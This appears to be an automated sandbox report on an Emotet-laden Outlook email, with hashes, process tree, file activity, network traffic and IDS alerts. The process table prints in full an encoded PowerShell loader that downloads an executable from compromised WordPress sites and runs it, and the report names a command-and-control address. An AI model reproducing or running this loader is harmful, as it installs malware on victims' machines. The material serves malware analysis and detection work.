File name: | Administrator Notification_ Redirecting email with malware.msg |
Full analysis: | https://app.any.run/tasks/143bd81b-773a-437a-a3d2-95019312b9ef |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 16:12:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 1980EF47AFBD461214935AFA653576B3 |
SHA1: | D4A5F058452A6C04615245B5A70C09DA0464A189 |
SHA256: | C1F7F8B62BD82CB682F69CFEB9F05E2404E3DE061D9CE06E2DBE586EC199E547 |
SSDEEP: | 12288:oNyxNRIIt1POT3XtwNJ6mdRXZ7NSU4VePg:oNyxNRIIt1POT3XtwNJ6mdVhHd |
.msg | | | Outlook Message (41.3) |
---|---|---|
.oft | | | Outlook Form Template (24.1) |
.doc | | | Microsoft Word document (18.6) |
.doc | | | Microsoft Word document (old ver.) (11) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3424 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
1440 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Document_18092019 21267.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2664 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2752 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3940 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3312 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3456 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2364 | --f0e46278 | C:\Users\admin\835.exe | 835.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3992 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3096 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR9AED.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF031F711A5710E486.TMP | — | |
MD5:— | SHA256:— | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Document_18092019 21267 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
1440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1CAF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2EBF2002-1694-45AA-95E5-2C6F688EFDAF.0\F6E4509.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:6D39279EA3CD5ED83257A3365C84286C | SHA256:D13BA6EC69DF9B95F7CD4657B49863BC8A90D1C5FCFDD6B0AFCFA6E35ED9A230 | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Re Invoices for University of Toronto Facilities.msg | msg | |
MD5:BEF2588E81052BCE054D119090A3A7EA | SHA256:871A5CC6732631BF6285803A0EE6D653534D087C190393B410DC5B1BFACD0A28 | |||
1440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:3874C09F319C17BEA2E15B9310753595 | SHA256:095E3911376E4BE368DE99457F64E9A7F6B3741A66F6A0BAB24F3B8550FE8F57 | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_E15AD21F8B3EA04EB23DF3A769BEC26F.dat | xml | |
MD5:B21ED3BD946332FF6EBC41A87776C6BB | SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4 | |||
3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_8099E0CD16D4B64191B558BC0DD9A3E1.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3424 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2752 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 400 Kb | suspicious |
3796 | easywindow.exe | POST | 200 | 189.129.4.186:80 | http://189.129.4.186/enabled/vermont/ringin/merge/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3424 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2752 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
3796 | easywindow.exe | 189.129.4.186:80 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
thinhvuongmedia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2752 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3796 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3796 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |